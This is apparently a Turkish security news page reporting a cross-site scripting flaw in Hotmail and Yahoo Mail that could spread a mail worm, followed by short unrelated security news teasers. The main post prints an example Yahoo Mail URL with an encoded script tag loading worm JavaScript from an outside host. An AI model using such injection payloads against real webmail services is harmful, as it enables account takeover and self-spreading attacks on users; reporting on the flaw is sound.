Hotmail ve Yahoomail virus tehdidi altında

0
conan
Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.
Yahoomail için link örneği: http://us.f117.mail.yahoo.com/ym/ShowFolder?ET=1&YY=12345&inc=10&order=asd%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Gelelim işin asıl önemli boyutuna. Email içinde verilen link ile web tabanlı email servisinin serverının adresi aynı olduğundan (domain bazında) bu link hiçbir güvenlik yorumundan geçmeden kullanıcıya sunuluyor. (no domain bounding error) 2 haziran itibari ile her iki büyük web mail servisi de bu sorunu yamamış gibi gözüküyor.

Ayrıntılı bilgi:
- SideSport: Sorunu bulan kişinin sitesi
- SecurityFocusda bu konudaki haber

İlgili Yazılar

myspace.com'a Türkiye Kökenli Virüs Saldırısı

FZ

Dünyanın en çok ziyaret edilen ilk 10 web sitesinden myspace.com'da geçtiğimiz hafta büyük bir reklam skandalı yaşandı. Sayfanın reklamlarını gösteren sisteme sızan korsanlar, içinde Truva atı virüsü barındıran bir kodu ziyaretçilere göstermeyi başardı. Rus korsanların bir Türk sitesinin içine sızarak yönettiği operasyon sonucunda 2 milyona yakın kişinin bilgisayarına sızıldı.

Haberin devamı: Radikal

Çalışanların 2/3'ü şifrelerini not ediyor

anonim

Searchsecurity.com tarafından yapılan araştırmada kullanıcılar IT şifrelerini en az bir defa kağıt kalem ile not ettiklerini itiraf ettiler. Bunun başlıca sebebi olarak firmaların yüzde 75'inin şifreleri en az 13 haftada bir değiştirmeleri cevabını verdiler.

Şirketler şifre seçiminin önemini yavaş yavaş kavramaya başladı fakat güvenli sağlam şifre ile akılda kalması çok zor şifre arasındaki ince çizgiyi fark etmek gerekiyor aksi takdirde kullanıcı şifreyi not almak ve hatta bu notu ekranın köşesine iliştirmek zorunda kalıyor.
Zincir en zayıf halkası kadar güçlüdür sözünü bir kez daha hatırlatıyorum.
Haberin Kaynağı

Netsec Güvenlik Bülteni: Sayı 30 – 18.07.2010

anonim

Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 30. sayısı çıktı.

SecurityFocus Internet Tarayıcı Uyarısı

Soulblighter

Daha önce "BugTraq Tarayıcı Testi" ile ilgili bir yazı yollamıştım. Bu yazıdan sonra SecurityFocus internet tarayıcılarla ilgili uyarıları yayınladı. BugTraq testinde IE'nin kodunun diğerlerinden daha iyi olduğu ve hatalı HTML kodlarını düzgün sorunsuz yorumladığına dair bilgi verilmişti. Fakat SecurityFocus aynı uyarıyı IE için de yapmış. Kısacası IE dahil tüm tarayıcılar bu soruna sahip. Ben de size SecurityFocus sonuçlarını çeviriyorum.

IstSec '09 - İstanbul Bilgi Güvenliği Konferansı

sundance

2009 yılında dünyaya damgası vuran ve siber tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, bilgi güvenliğini bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur. ISTSEC ‘09 konferansı bu eksendeki soru ve sorunlara çözüm ve çözüm önerileri sunmayı hedeflemektedir.

Kayıt için www.istsec.org